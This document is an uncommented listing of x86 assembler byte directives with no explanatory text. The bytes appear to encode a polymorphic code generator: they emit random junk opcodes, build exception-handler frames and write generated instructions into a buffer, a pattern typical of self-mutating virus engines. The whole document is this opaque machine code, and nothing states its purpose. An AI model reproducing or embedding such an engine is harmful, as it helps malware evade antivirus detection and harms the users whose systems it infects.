db 0C0h,0C0h,0E4h,003h,00Ah,0C4h,0AAh,0B0h,0FFh,0FFh,0D6h,0AAh,0C3h,08Bh
|
||
|
db 039h,002h,07Fh,0B7h,039h,002h,040h,0BFh,039h,002h,040h,087h,039h,002h
|
||
|
db 0BFh,003h,039h,002h,07Fh,013h,039h,002h,07Fh,023h,039h,002h,07Fh,00Bh
|
||
|
db 039h,002h,07Fh,02Bh,039h,002h,07Fh,01Bh,039h,002h,07Fh,033h,039h,002h
|
||
|
db 07Fh,040h,043h,002h,07Fh,048h,043h,002h,07Fh,039h,039h,002h,03Fh,085h
|
||
|
db 039h,002h,03Fh,0D1h,047h,002h,07Fh,0D3h,047h,002h,07Fh,0A4h,059h,002h
|
||
|
db 040h,0ACh,059h,002h,040h,0C8h,043h,002h,040h,0ABh,039h,002h,080h,0B3h
|
||
|
db 039h,002h,080h,0BBh,039h,002h,080h,0E8h,09Eh,000h,000h,000h,0B8h,064h
|
||
|
db 067h,0FFh,036h,0ABh,02Bh,0C0h,066h,0ABh,0E8h,07Fh,000h,000h,000h,0E8h
|
||
|
db 08Ah,000h,000h,000h,0B0h,0E8h,0AAh,0ABh,057h,0E8h,070h,000h,000h,000h
|
||
|
db 0E8h,07Bh,000h,000h,000h,0B8h,064h,067h,08Fh,006h,0ABh,02Bh,0C0h,066h
|
||
|
db 0ABh,0E8h,05Ch,000h,000h,000h,0E8h,067h,000h,000h,000h,0B0h,0E9h,0AAh
|
||
|
db 0ABh,08Bh,0D7h,0E8h,04Ch,000h,000h,000h,0E8h,057h,000h,000h,000h,058h
|
||
|
db 08Bh,0DFh,02Bh,0D8h,089h,058h,0FCh,0E8h,03Ah,000h,000h,000h,0E8h,045h
|
||
|
db 000h,000h,000h,0B8h,064h,067h,08Fh,006h,0ABh,02Bh,0C0h,066h,0ABh,0E8h
|
||
|
db 026h,000h,000h,000h,0E8h,031h,000h,000h,000h,0B8h,064h,067h,0FFh,026h
|
||
|
db 0ABh,02Bh,0C0h,066h,0ABh,0E8h,012h,000h,000h,000h,0B0h,0FFh,0FFh,0D6h
|
||
|
db 0AAh,0E8h,008h,000h,000h,000h,08Bh,0C7h,02Bh,0C2h,089h,042h,0FCh,0C3h
|
||
|
db 0B0h,005h,0FFh,0D6h,040h,091h,051h,0E8h,013h,000h,000h,000h,059h,0E2h
|
||
|
db 0F7h,0C3h,080h,0BDh,07Eh,023h,040h,000h,001h,075h,005h,0E8h,009h,000h
|
||
|
db 000h,000h,0C3h,0B0h,004h,0FFh,0D6h,022h,0C0h,075h,049h,0B0h,000h,084h
|
||
|
db 0C0h,075h,012h,0FEh,085h,07Eh,023h,040h,000h,0B0h,0E8h,0AAh,089h,0BDh
|
||
|
db 09Eh,023h,040h,000h,0ABh,0EBh,031h,0E8h,085h,0FEh,0FFh,0FFh,00Ch,0B8h
|
||
|
db 0AAh,0B8h,034h,099h,040h,000h,08Bh,0DFh,02Bh,0D8h,057h,097h,093h,083h
|
||
|
db 0E8h,004h,0ABh,05Fh,0B0h,0C3h,0AAh,06Ah,0FFh,058h,0FFh,095h,006h,020h
|
||
|
db 040h,000h,066h,0ABh,0C1h,0E8h,010h,0AAh,0FEh,08Dh,07Eh,023h,040h,000h
|
||
|
db 0B0h,01Ah,0FFh,0D6h,03Ch,019h,075h,016h,0E8h,009h,000h,000h,000h,0F8h
|
||
|
db 0FCh,0FAh,0F5h,0FBh,090h,0F9h,0FDh,09Eh,05Bh,0B0h,009h,0FFh,0D6h,0D7h
|
||
|
db 0AAh,0C3h,03Ch,018h,075h,017h,052h,06Ah,0FFh,058h,0FFh,095h,006h,020h
|
||
|
db 040h,000h,092h,0E8h,027h,0FEh,0FFh,0FFh,0E8h,001h,0FEh,0FFh,0FFh,05Ah
|
||
|
db 0C3h,03Ch,017h,075h,01Dh,0B0h,08Dh,0AAh,0E8h,014h,0FEh,0FFh,0FFh,03Ch
|
||
|
db 005h,074h,0F7h,0C0h,0E0h,003h,00Ch,005h,0AAh,06Ah,0FFh,058h,0FFh,095h
|
||
|
db 006h,020h,040h,000h,0ABh,0C3h,08Dh,09Ch,085h,067h,022h,040h,000h,0E8h
|
||
|
db 0EAh,0FDh,0FFh,0FFh,074h,003h,0B0h,066h,0AAh,0F6h,043h,003h,03Fh,075h
|
||
|
db 003h,0B0h,00Fh,0AAh,08Ah,003h,0AAh,08Ah,043h,003h,024h,0C0h,03Ch,000h
|
||
|
db 075h,016h,0B0h,008h,0FFh,095h,006h,020h,040h,000h,08Ah,0C8h,0B0h,008h
|
||
|
db 0FFh,095h,006h,020h,040h,000h,08Ah,0E1h,0EBh,02Bh,03Ch,040h,075h,015h
|
||
|
db 0E8h,0BAh,0FDh,0FFh,0FFh,08Ah,0C8h,0B0h,008h,0FFh,095h,006h,020h,040h
|
||
|
db 000h,08Ah,0E0h,08Ah,0C1h,0EBh,012h,0E8h,0A5h,0FDh,0FFh,0FFh,08Ah,0C8h
|
||
|
db 0E8h,09Eh,0FDh,0FFh,0FFh,03Ah,0C1h,074h,0F0h,08Ah,0E1h,00Fh,0B7h,05Bh
|
||
|
db 001h,08Dh,09Ch,01Dh,000h,020h,040h,000h,0FFh,0D3h,0C3h
|